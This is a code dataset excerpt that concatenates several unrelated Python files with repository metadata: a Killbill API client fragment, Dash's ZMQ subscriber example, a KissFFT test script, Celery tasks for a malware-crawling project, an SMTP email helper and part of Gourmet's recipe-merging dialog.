"Got an unexpected keyword argument '%s'"
" to method transfer_child_credit_to_parent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'child_account_id' is set
if ('child_account_id' not in params or
params['child_account_id'] is None):
raise ValueError("Missing the required parameter `child_account_id` when calling `transfer_child_credit_to_parent`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `transfer_child_credit_to_parent`") # noqa: E501
if 'child_account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['child_account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `child_account_id` when calling `transfer_child_credit_to_parent`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'child_account_id' in params:
path_params['childAccountId'] = params['child_account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{childAccountId}/transferCredit', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Update account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_account(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Account body: (required)
:param Str created_by: (required)
:param Bool treat_null_as_reset:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_account_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.update_account_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def update_account_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Update account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_account_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Account body: (required)
:param Str created_by: (required)
:param Bool treat_null_as_reset:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'treat_null_as_reset', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `update_account`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `update_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `update_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'treat_null_as_reset' in params:
query_params.append(('treatNullAsReset', params['treat_null_as_reset'])) # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
apache-2.0
| 8,223,314,462,339,926,000
| 42.553597
| 207
| 0.58277
| false
| 4.037577
| false
| false
| false
|
nmarley/dash
|
contrib/zmq/zmq_sub.py
|
1
|
5988
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
ZMQ example using python3's asyncio
Dash should be started with the command line arguments:
dashd -testnet -daemon \
-zmqpubrawtx=tcp://127.0.0.1:28332 \
-zmqpubrawblock=tcp://127.0.0.1:28332 \
-zmqpubhashtx=tcp://127.0.0.1:28332 \
-zmqpubhashblock=tcp://127.0.0.1:28332
We use the asyncio library here. `self.handle()` installs itself as a
future at the end of the function. Since it never returns with the event
loop having an empty stack of futures, this creates an infinite loop. An
alternative is to wrap the contents of `handle` inside `while True`.
A blocking example using python 2.7 can be obtained from the git history:
https://github.com/bitcoin/bitcoin/blob/37a7fe9e440b83e2364d5498931253937abe9294/contrib/zmq/zmq_sub.py
"""
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if not (sys.version_info.major >= 3 and sys.version_info.minor >= 5):
print("This example only works with Python 3.5 and greater")
exit(1)
port = 28332
class ZMQHandler():
def __init__(self):
self.loop = asyncio.get_event_loop()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashchainlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtxlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashgovernancevote")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashgovernanceobject")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashinstantsenddoublespend")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawchainlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawchainlocksig")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtxlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtxlocksig")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawgovernancevote")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawgovernanceobject")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawinstantsenddoublespend")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
async def handle(self) :
msg = await self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashchainlock":
print('- HASH CHAINLOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashtx":
print ('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashtxlock":
print('- HASH TX LOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashgovernancevote":
print('- HASH GOVERNANCE VOTE ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashgovernanceobject":
print('- HASH GOVERNANCE OBJECT ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashinstantsenddoublespend":
print('- HASH IS DOUBLE SPEND ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]).decode("utf-8"))
elif topic == b"rawchainlock":
print('- RAW CHAINLOCK ('+sequence+') -')
print(binascii.hexlify(body[:80]).decode("utf-8"))
elif topic == b"rawchainlocksig":
print('- RAW CHAINLOCK SIG ('+sequence+') -')
print(binascii.hexlify(body[:80]).decode("utf-8"))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawtxlock":
print('- RAW TX LOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawtxlocksig":
print('- RAW TX LOCK SIG ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawgovernancevote":
print('- RAW GOVERNANCE VOTE ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawgovernanceobject":
print('- RAW GOVERNANCE OBJECT ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawinstantsenddoublespend":
print('- RAW IS DOUBLE SPEND ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
# schedule ourselves to receive the next message
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
|
mit
| 356,747,117,795,739,300
| 43.686567
| 107
| 0.629092
| false
| 3.532743
| false
| false
| false
|
mpoullet/audio-tools
|
KissFFT/kiss_fft130/test/testkiss.py
|
1
|
3565
|
#!/usr/bin/env python
import math
import sys
import os
import random
import struct
import popen2
import getopt
import numpy
pi=math.pi
e=math.e
j=complex(0,1)
doreal=0
datatype = os.environ.get('DATATYPE','float')
util = '../tools/fft_' + datatype
minsnr=90
if datatype == 'double':
fmt='d'
elif datatype=='int16_t':
fmt='h'
minsnr=10
elif datatype=='int32_t':
fmt='i'
elif datatype=='simd':
fmt='4f'
sys.stderr.write('testkiss.py does not yet test simd')
sys.exit(0)
elif datatype=='float':
fmt='f'
else:
sys.stderr.write('unrecognized datatype %s\n' % datatype)
sys.exit(1)
def dopack(x,cpx=1):
x = numpy.reshape( x, ( numpy.size(x),) )
if cpx:
s = ''.join( [ struct.pack(fmt*2,c.real,c.imag) for c in x ] )
else:
s = ''.join( [ struct.pack(fmt,c.real) for c in x ] )
return s
def dounpack(x,cpx):
uf = fmt * ( len(x) / struct.calcsize(fmt) )
s = struct.unpack(uf,x)
if cpx:
return numpy.array(s[::2]) + numpy.array( s[1::2] )*j
else:
return numpy.array(s )
def make_random(dims=[1]):
res = []
for i in range(dims[0]):
if len(dims)==1:
r=random.uniform(-1,1)
if doreal:
res.append( r )
else:
i=random.uniform(-1,1)
res.append( complex(r,i) )
else:
res.append( make_random( dims[1:] ) )
return numpy.array(res)
def flatten(x):
ntotal = numpy.size(x)
return numpy.reshape(x,(ntotal,))
def randmat( ndims ):
dims=[]
for i in range( ndims ):
curdim = int( random.uniform(2,5) )
if doreal and i==(ndims-1):
curdim = int(curdim/2)*2 # force even last dimension if real
dims.append( curdim )
return make_random(dims )
def test_fft(ndims):
x=randmat( ndims )
if doreal:
xver = numpy.fft.rfftn(x)
else:
xver = numpy.fft.fftn(x)
open('/tmp/fftexp.dat','w').write(dopack( flatten(xver) , True ) )
x2=dofft(x,doreal)
err = xver - x2
errf = flatten(err)
xverf = flatten(xver)
errpow = numpy.vdot(errf,errf)+1e-10
sigpow = numpy.vdot(xverf,xverf)+1e-10
snr = 10*math.log10(abs(sigpow/errpow) )
print 'SNR (compared to NumPy) : %.1fdB' % float(snr)
if snr<minsnr:
print 'xver=',xver
print 'x2=',x2
print 'err',err
sys.exit(1)
def dofft(x,isreal):
dims=list( numpy.shape(x) )
x = flatten(x)
scale=1
if datatype=='int16_t':
x = 32767 * x
scale = len(x) / 32767.0
elif datatype=='int32_t':
x = 2147483647.0 * x
scale = len(x) / 2147483647.0
cmd='%s -n ' % util
cmd += ','.join([str(d) for d in dims])
if doreal:
cmd += ' -R '
print cmd
p = popen2.Popen3(cmd )
open('/tmp/fftin.dat','w').write(dopack( x , isreal==False ) )
p.tochild.write( dopack( x , isreal==False ) )
p.tochild.close()
res = dounpack( p.fromchild.read() , 1 )
open('/tmp/fftout.dat','w').write(dopack( flatten(res) , True ) )
if doreal:
dims[-1] = int( dims[-1]/2 ) + 1
res = scale * res
p.wait()
return numpy.reshape(res,dims)
def main():
opts,args = getopt.getopt(sys.argv[1:],'r')
opts=dict(opts)
global doreal
doreal = opts.has_key('-r')
if doreal:
print 'Testing multi-dimensional real FFTs'
else:
print 'Testing multi-dimensional FFTs'
for dim in range(1,4):
test_fft( dim )
if __name__ == "__main__":
main()
|
mit
| -8,352,119,809,851,959,000
| 21.006173
| 72
| 0.555961
| false
| 2.861156
| true
| false
| false
|
chrissorchard/malucrawl
|
malware_crawl/tasks.py
|
1
|
2599
|
from celery import task, chord
from .scan import scanners, heavy_scanners
from .search import search_engines
from .source import sources
from datetime import datetime
from dateutil.tz import tzutc
from models import TopicSet
# validator = jsonschema.Draft3Validator(json.loads(pkgutil.get_data("malware_crawl", "malware_discovery_schema.json")))
def complete_crawl():
for source in sources:
source.apply_async(
link=begin_search.subtask(args=(source,))
)
# todo: repeat old searches
@task
def begin_search(keywords, source):
discovered = datetime.now(tzutc())
ts = TopicSet.objects.create(
discovered=discovered,
source=source
)
for keyword in keywords:
topic = ts.topic_set.create(
keyword=keyword
)
for engine in search_engines:
engine.apply_async(
args=(keyword,), link=begin_scan.subtask(args=(engine, topic))
)
@task
def begin_scan(urls, engine, topic):
discovered = datetime.now(tzutc())
search = topic.search_set.create(
discovered=discovered,
source=engine
)
for url in urls:
result = search.result_set.create(
url=url
)
for scanner in scanners:
report = result.malwarereport_set.create(
reporter=scanner
)
scanner.apply_async(
args=(url,),
link=begin_store.subtask(
args=(report,)
)
)
"""
# Check to see if we should scan heavily
def check_opinions(all_opinions, reporters):
print all_opinions
return False
@task
def accept_scan(all_opinions, reporters, url, result):
if check_opinions(all_opinions, reporters):
for scanner in heavy_scanners:
report = result.malwarereport_set.create(
reporter=scanner
)
scanner.apply_async(
args=(url,),
link=begin_store.subtask(
args=(report,)
)
)
for opinions, reporter in zip(all_opinions, reporters):
begin_store.apply_async(
args=(opinions, report)
)
"""
@task
def begin_store(opinions, report):
for opinion in opinions:
report.opinion_set.create(
type=opinion["type"],
confidence=opinion["confidence"]
)
@task
def tprint(content):
print content
|
mit
| -8,517,734,512,202,998,000
| 22.518868
| 120
| 0.560215
| false
| 4.086478
| false
| false
| false
|
atvKumar/TheWatcher
|
mkEmail.py
|
1
|
5302
|
from smtplib import SMTP, SMTP_SSL
from smtplib import SMTPException
from mimetypes import guess_type
from os.path import basename
from email.utils import COMMASPACE
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.encoders import encode_base64
class EmailConnectionError(Exception):
pass
class SendEmailError(Exception):
pass
def get_email(email):
if '<' in email:
data = email.split('<')
email = data[1].split('>')[0].strip()
return email.strip()
class Email(object):
def __init__(self, from_, to, subject, message, message_type='plain',
attachments=None, cc=None, bcc=None,
message_encoding='us-ascii', multi_to=False, multi_cc=False,
multi_bcc=False, multi_attach=False):
self.email = MIMEMultipart()
self.message = message
self.email['From'] = from_
if not multi_to:
self.email['To'] = to
else:
self.email['To'] = COMMASPACE.join(to)
self.email['Subject'] = subject
self.email['subject'] = subject # Case Sensitive Email-Readers
if cc is not None:
if not multi_cc:
self.email['Cc'] = cc
else:
self.email['Cc'] = COMMASPACE.join(cc)
if bcc is not None:
if not multi_bcc:
self.email['bcc'] = bcc
else:
self.email['bcc'] = COMMASPACE.join(bcc)
text = MIMEText(message, message_type, message_encoding)
self.email.attach(text)
if attachments is not None:
if multi_attach:
for filename in attachments:
self.attach(filename)
else:
self.attach(attachments)
def debug(self, mime=False):
print 'From : ', self.email['From']
print 'To : ', self.email['To']
print 'Cc : ', self.email['Cc']
print 'Bcc : ', self.email['bcc']
print 'Subject : ', self.email['Subject']
print 'Message :', self.message
if mime:
print self.email.as_string()
def attach(self, filename):
mimetype, encoding = guess_type(filename)
if mimetype is None:
mimetype = 'application/octet-stream'
mimetype = mimetype.split('/', 1)
fp = open(filename, 'rb')
attachment = MIMEBase(mimetype[0], mimetype[1])
attachment.set_payload(fp.read())
fp.close()
encode_base64(attachment)
attachment.add_header('Content-Disposition', 'attachment',
filename=basename(filename))
self.email.attach(attachment)
def __str__(self):
return self.email.as_string()
class EmailConnection(object):
def __init__(self, server, username, password, debug=False):
if ':' in server:
data = server.split(':')
self.server = data[0]
self.port = int(data[1])
else:
self.server = server
self.port = 25
self.username = username
self.password = password
self.connect(debug)
def __enter__(self):
return self
def __exit__(self, exception_type, exception_val, trace):
self.close()
def connect(self, debug):
self.connection = SMTP(host=self.server, port=self.port)
if debug: # Debug Information
# self.debuglevel = 1
self.connection.set_debuglevel(debug)
# identify ourselves, prompting server for supported features
self.connection.ehlo()
# If we can encrypt this session, do it
if self.connection.has_extn('STARTTLS'):
self.connection.starttls()
self.connection.ehlo()
self.connection.esmtp_features['auth'] = 'PLAIN LOGIN'
self.connection.login(self.username, self.password)
def send(self, message, from_=None, to=None, verify=False):
if type(message) == str:
if from_ is None or to is None:
raise EmailConnectionError('You need to specify `from_` '
'and `to`')
else:
from_ = get_email(from_)
to = get_email(to)
else:
from_ = message.email['From']
if 'Cc' not in message.email:
message.email['Cc'] = ''
if 'bcc' not in message.email:
message.email['bcc'] = ''
to_emails = list(message.email['To'].split(',')) + \
message.email['Cc'].split(',') + \
message.email['bcc'].split(',')
to = [get_email(complete_email) for complete_email in to_emails]
message = str(message)
if verify:
for each_email in to_emails:
self.connection.verify(each_email)
# TODO option - remove emails that failed verification
# return self.connection.sendmail(from_, to, message)
try:
self.connection.sendmail(from_, to, message)
except SMTPException:
raise SendEmailError('Message Could not be sent!')
def close(self):
self.connection.close()
|
apache-2.0
| -3,787,192,903,398,085,000
| 35.068027
| 77
| 0.557714
| false
| 4.184688
| false
| false
| false
|
thinkle/gourmet
|
gourmet/plugins/duplicate_finder/recipeMerger.py
|
1
|
25533
|
"""recipeMerger.py
This module contains code for handling the 'merging' of duplicate
recipes.
"""
import os.path
import time
from typing import Union
from gettext import gettext as _
from gi.repository import Gtk, Pango
from gourmet import convert, gglobals, recipeIdentifier, recipeManager
from gourmet.gtk_extras import ratingWidget, mnemonic_manager, dialog_extras
NEWER = 1
OLDER = 2
try:
current_path = os.path.split(os.path.join(os.getcwd(),__file__))[0]
except:
current_path = ''
def time_to_text (val):
curtime = time.time()
if val == 0:
return 'Unknown'
# within 18 hours, return in form 4 hours 23 minutes ago or some such
if curtime - val < 18 * 60 * 60:
return _("%s ago")%convert.seconds_to_timestring(curtime-val,round_at=1)
tupl=time.localtime(val)
if curtime - val < 7 * 24 * 60 * 60:
return time.strftime('%A %T',tupl)
else:
return time.strftime('%D %T',tupl)
class ConflictError (ValueError):
def __init__ (self, conflicts):
self.conflicts = conflicts
class RecipeMergerDialog:
"""A dialog to allow the user to merge recipes.
"""
# These line up to the position of the options in the search-type
# combo box in glade...
RECIPE_DUP_MODE = 0
ING_DUP_MODE = 1
COMPLETE_DUP_MODE = 2
DUP_INDEX_PAGE = 0
MERGE_PAGE = 1
def __init__ (self, rd=None, in_recipes=None, on_close_callback=None):
if rd:
self.rd = rd
else:
self.rd = recipeManager.get_recipe_manager()
self.in_recipes = in_recipes
self.on_close_callback = on_close_callback
self.to_merge = [] # Queue of recipes to be merged...
self.ui = Gtk.Builder()
self.ui.add_from_file(os.path.join(current_path,'recipeMerger.ui'))
self.get_widgets()
self.searchTypeCombo.set_active(self.COMPLETE_DUP_MODE)
self.mm = mnemonic_manager.MnemonicManager()
self.mm.add_builder(self.ui)
self.mm.fix_conflicts_peacefully()
self.ui.connect_signals(
{
'on_searchTypeCombo_changed':lambda *args: self.populate_tree(),
'on_includeDeletedRecipesCheckButton_toggled':lambda *args: self.populate_tree(),
'on_mergeAllButton_clicked':self.merge_all,
'on_cancelMergeButton_clicked':self.cancel_merge,
'on_mergeSelectedButton_clicked':self.merge_selected,
'on_applyButton_clicked':self.apply_merge,
'auto_merge':self.offer_auto_merge,
'close':self.close,
}
)
def get_widgets (self):
for w in [
'recipeDiffScrolledWindow',
'duplicateRecipeTreeView',
'mergeAllButton','mergeSelectedButton', # buttons on list-dups page (minus close button)
'applyMergeButton','closeMergeButton','cancelMergeButton', # buttons on merge-recs page
'searchTypeCombo','includeDeletedRecipesCheckButton','notebook',
'mergeInfoLabel'
]:
setattr(self,w,self.ui.get_object(w))
self.setup_treeview()
def setup_treeview (self):
renderer = Gtk.CellRendererText()
col = Gtk.TreeViewColumn('Recipe',renderer,text=2)
self.duplicateRecipeTreeView.append_column(col)
self.duplicateRecipeTreeView.insert_column_with_data_func(
-1, # position
'Last Modified', # title
renderer, # renderer
self.time_cell_data_func, # function
3 # data column
)
col = Gtk.TreeViewColumn('Duplicates',renderer,text=4)
self.duplicateRecipeTreeView.append_column(col)
self.duplicateRecipeTreeView.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
def time_cell_data_func (self, tree_column, cell, model, titer, data_col):
"""Display time in treeview cell.
"""
val = model.get_value(titer,data_col)
cell.set_property('text',time_to_text(val))
def populate_tree (self):
"""Populate treeview with duplicate recipes.
"""
#print 'CALL: populate_tree'
search_mode =self.searchTypeCombo.get_active()
include_deleted = self.includeDeletedRecipesCheckButton.get_active()
if search_mode == self.RECIPE_DUP_MODE:
dups = self.rd.find_duplicates(by='recipe',
recipes=self.in_recipes,
include_deleted=include_deleted)
elif search_mode == self.ING_DUP_MODE:
dups = self.rd.find_duplicates(by='ingredient',
recipes=self.in_recipes,
include_deleted=include_deleted)
else: # == self.COMPLETE_DUP_MODE
dups = self.rd.find_complete_duplicates(include_deleted=include_deleted,
recipes=self.in_recipes)
self.setup_treemodel(dups)
self.dups = dups
self.duplicateRecipeTreeView.set_model(self.treeModel)
def setup_treemodel (self, dups):
self.treeModel = Gtk.TreeStore(int,int,str,int,str) # dup_index, rec_id, rec_title, last_modified, number_of_duplicates
for dup_index,duplicate_recipes in enumerate(dups):
first = duplicate_recipes[0]
others = duplicate_recipes[1:]
nduplicates = len(duplicate_recipes)
r = self.rd.get_rec(first)
firstIter = self.treeModel.append(
None,
(dup_index or 0, first or 0, r.title or '', r.last_modified or 0, str(nduplicates))
)
for o in others:
r = self.rd.get_rec(o)
self.treeModel.append(firstIter,
(dup_index,o,r.title,r.last_modified or 0,'')
)
def merge_next_recipe (self, ):
if self.to_merge:
self.current_dup_index = self.to_merge.pop(0)
self.mergeInfoLabel.set_text(
'Merging recipe %(index)s of %(total)s'%{
'index':self.total_to_merge - len(self.to_merge),
'total':self.total_to_merge
})
duplicate_recipes = self.dups[self.current_dup_index]
#self.idt = IngDiffTable(self.rd,duplicate_recipes[0],duplicate_recipes[1])
self.current_recs = [self.rd.get_rec(i) for i in duplicate_recipes]
last_modified = {'last_modified':[r.last_modified for r in self.current_recs]}
self.current_diff_data = recipeIdentifier.diff_recipes(self.rd,self.current_recs)
last_modified.update(self.current_diff_data)
self.diff_table = DiffTable(last_modified,self.current_recs[0],parent=self.recipeDiffScrolledWindow)
self.diff_table.add_ingblocks(self.rd, self.current_recs)
if not self.diff_table.idiffs and not self.current_diff_data:
# If there are no differences, just merge the recipes...
self.apply_merge()
return
if self.recipeDiffScrolledWindow.get_child():
self.recipeDiffScrolledWindow.remove(self.recipeDiffScrolledWindow.get_child())
self.diff_table.show()
#self.idt.show()
vb = Gtk.VBox()
vb.add(self.diff_table)
#vb.add(self.idt)
vb.show()
#self.recipeDiffScrolledWindow.add_with_viewport(self.diff_table)
self.recipeDiffScrolledWindow.add_with_viewport(vb)
self.notebook.set_current_page(self.MERGE_PAGE)
else:
self.notebook.set_current_page(self.DUP_INDEX_PAGE)
def do_merge (self, merge_dic, recs, to_keep=None):
if not to_keep:
to_keep = recs[0]
if isinstance(to_keep, int):
to_keep = self.rd.get_rec(to_keep)
self.rd.modify_rec(to_keep,merge_dic)
for r in recs:
if r.id != to_keep.id:
self.rd.delete_rec(r)
def apply_merge (self, *args):
#print "CALL: apply_merge"
#print 'Apply ',self.diff_table.selected_dic,'on ',self.diff_table.rec
self.do_merge(self.diff_table.selected_dic,
self.current_recs,
to_keep=self.diff_table.rec)
self.merge_next_recipe()
if not self.to_merge:
self.populate_tree()
def merge_selected (self, *args):
"""Merge currently selected row from treeview.
"""
#print "CALL: merge_selected"
mod,rows = self.duplicateRecipeTreeView.get_selection().get_selected_rows()
dup_indices = [mod[r][0] for r in rows]
self.to_merge = []
for d in dup_indices:
if d not in self.to_merge:
self.to_merge.append(d)
self.total_to_merge = len(self.to_merge)
self.merge_next_recipe()
def merge_all (self, *args):
"""Merge all rows currently in treeview.
"""
self.total_to_merge = len(self.dups)
self.to_merge = list(range(self.total_to_merge))
self.merge_next_recipe()
def offer_auto_merge (self, *args):
try:
option =dialog_extras.getOption(
label=_('Auto-Merge recipes'),
options=[
(_('Always use newest recipe'),NEWER),
(_('Always use oldest recipe'),OLDER),
# The following would be nice to add eventually...
#_('Always use longer field'),
#_('Ignore differences in ingredient keys')
]
)
if not option:
return
self.do_auto_merge(NEWER)
except dialog_extras.UserCancelledError:
pass
def do_auto_merge (self, mode):
if self.recipeDiffScrolledWindow.get_child():
self.recipeDiffScrolledWindow.remove(self.recipeDiffScrolledWindow.get_child())
vb = Gtk.VBox()
l = Gtk.Label()
l.set_markup('<u>Automatically merged recipes</u>')
vb.pack_start(l,expand=False,fill=False); vb.show_all()
self.recipeDiffScrolledWindow.add_with_viewport(vb)
def do_auto_merge ():
kept = self.auto_merge_current_rec(mode)
label = Gtk.Label(label='%s'%kept.title)
vb.pack_start(label,expand=False,fill=False); label.show()
self.cancelMergeButton.hide()
self.applyMergeButton.hide()
self.closeMergeButton.set_sensitive(False)
do_auto_merge()
while self.to_merge:
self.mergeInfoLabel.set_text(
'Automatically merging recipe %(index)s of %(total)s'%{
'index':self.total_to_merge - len(self.to_merge),
'total':self.total_to_merge
})
self.current_dup_index = self.to_merge.pop(0)
duplicate_recipes = self.dups[self.current_dup_index]
self.current_recs = [self.rd.get_rec(i) for i in duplicate_recipes]
do_auto_merge()
while Gtk.events_pending(): Gtk.main_iteration()
self.mergeInfoLabel.set_text('Automatically merged %s recipes'%self.total_to_merge)
self.closeMergeButton.set_sensitive(True)
def auto_merge_current_rec (self, mode):
assert(mode in [NEWER, OLDER]) # TODO make this to an enum and type annotate it
self.current_recs.sort(key=lambda x: x.last_modified, reverse=(mode==OLDER))
keeper = self.current_recs[0]
tossers = self.current_recs[1:]
for to_toss in tossers:
self.rd.delete_rec(to_toss)
return keeper
def cancel_merge (self, *args):
self.merge_next_recipe()
if not self.to_merge:
self.populate_tree()
def populate_tree_if_possible (self):
self.populate_tree()
if not self.dups:
self.searchTypeCombo.set_active(self.RECIPE_DUP_MODE)
self.populate_tree()
if not self.dups:
self.searchTypeCombo.set_active(self.ING_DUP_MODE)
self.populate_tree()
def show_if_there_are_dups (self, label=None):
self.populate_tree_if_possible()
if self.dups:
self.show(label=label)
else:
self.ui.get_object('window1').destroy()
def show (self, label=None):
if label:
messagebox = self.ui.get_object('messagebox')
l = Gtk.Label(label=label)
l.set_line_wrap(True)
infobar = Gtk.InfoBar()
infobar.set_message_type(Gtk.MessageType.INFO)
infobar.get_content_area().add(l)
infobar.show_all()
messagebox.pack_start(infobar, True, False)
self.ui.get_object('window1').show()
def close (self, *args):
#print "CALL: close"
w = self.ui.get_object('window1')
w.hide()
w.destroy()
if self.on_close_callback:
self.on_close_callback(self)
class RecipeMerger:
"""A class to handle recipe merging.
"""
def __init__ (self, rd):
self.rd = rd
def autoMergeRecipes (self, recs):
to_fill,conflicts = recipeIdentifier.merge_recipes(self.rd, recs)
if conflicts:
raise ConflictError(conflicts)
else:
to_keep = recs[0]
# Update a single recipe with our information...
self.rd.modify_rec(to_keep,to_fill)
# Delete the other recipes...
for r in recs[1:]:
self.rd.delete_rec(r.id)
def uiMergeRecipes (self, recs):
